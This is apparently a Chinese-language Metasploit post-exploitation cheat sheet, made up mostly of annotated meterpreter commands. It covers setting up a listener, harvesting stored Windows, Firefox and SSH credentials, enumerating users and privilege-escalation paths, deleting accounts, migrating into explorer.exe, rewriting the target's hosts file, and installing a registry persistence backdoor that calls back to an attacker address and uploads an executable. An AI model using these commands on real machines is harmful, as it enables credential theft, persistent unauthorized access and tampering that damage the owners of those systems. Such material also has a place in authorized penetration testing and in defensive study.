msf exploit(psexec) > use exploit/multi/handler
msf exploit(handler) > set exitonsession false 运行这条命令后,4444端口会一直处于侦听状态
msf exploit(handler) > exploit -j -z
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.80.0/24
meterpreter > run post/windows/gather/credentials/credential_collector 目标主机上的身份认证信息
meterpreter > run post/windows/gather/enum_applications 目标主机安装了哪些软件
meterpreter > run post/windows/gather/enum_logged_on_users 目标主机当前在线的用户(SID=500是管理员账号)
meterpreter > run post/windows/gather/enum_snmp 枚举snmp信息
meterpreter > run post/multi/recon/local_exploit_suggester 目标主机存在哪些本地提权漏洞
meterpreter > run post/windows/manage/delete_user USERNAME=a 删除目标主机的a账号
meterpreter > run post/multi/gather/env 目标主机环境变量信息
meterpreter > run post/multi/gather/firefox_creds 目标主机火狐浏览器保存的账号密码
meterpreter > run post/multi/gather/ssh_creds 目标主机保存的ssh身份验证信息(linux系统常用)
meterpreter > getpid
meterpreter > ps
meterpreter > migrate -N explorer.exe 将meterpreter进程转移到explorer.exe中
自动执行post模块
实例:获得shell后,自动执行migrate命令来迁移进程
msf exploit(handler) > show advanced 查看高级参数
msf exploit(handler) > set autorunscript migrate -n explorer.exe
msf exploit(handler) > exploit
或者使用post/windows/manage/migrate模块,同样能达到迁移进程的效果。
meterpreter > info post/windows/manage/migrate 查看模块的详细信息
msf exploit(handler) > set autorunscript post/windows/manage/migrate name=explorer.exe spawn=false
msf exploit(handler) > exploit
msf exploit(handler) > set initialautorunscript post/windows/manage/migrate 成功exploit后,自动执行migrate模块(before AutoRunScript)
meterpreter > run post/windows/manage/inject_host ip=1.1.1.1 domain=www.baidu.com 修改目标主机的host文件
这些只是一小部分post模块,在meterpreter下按两下tab键,有200多个post模块,可以多尝试使用!
后门
meterpreter > run persistence -X -i 5 -p 1234 -r 192.168.80.163 向目标主机的注册表添加键值,使后门程序开机自启
msf > resource handler.rc 可以直接获得目标主机的shell,注意此时lport是1234
meterpreter > run persistence -X -i 5 -p 77 -T /root/ccc.exe -r 192.168.80.163 用-T选项指定上传的执行程序是ccc.exe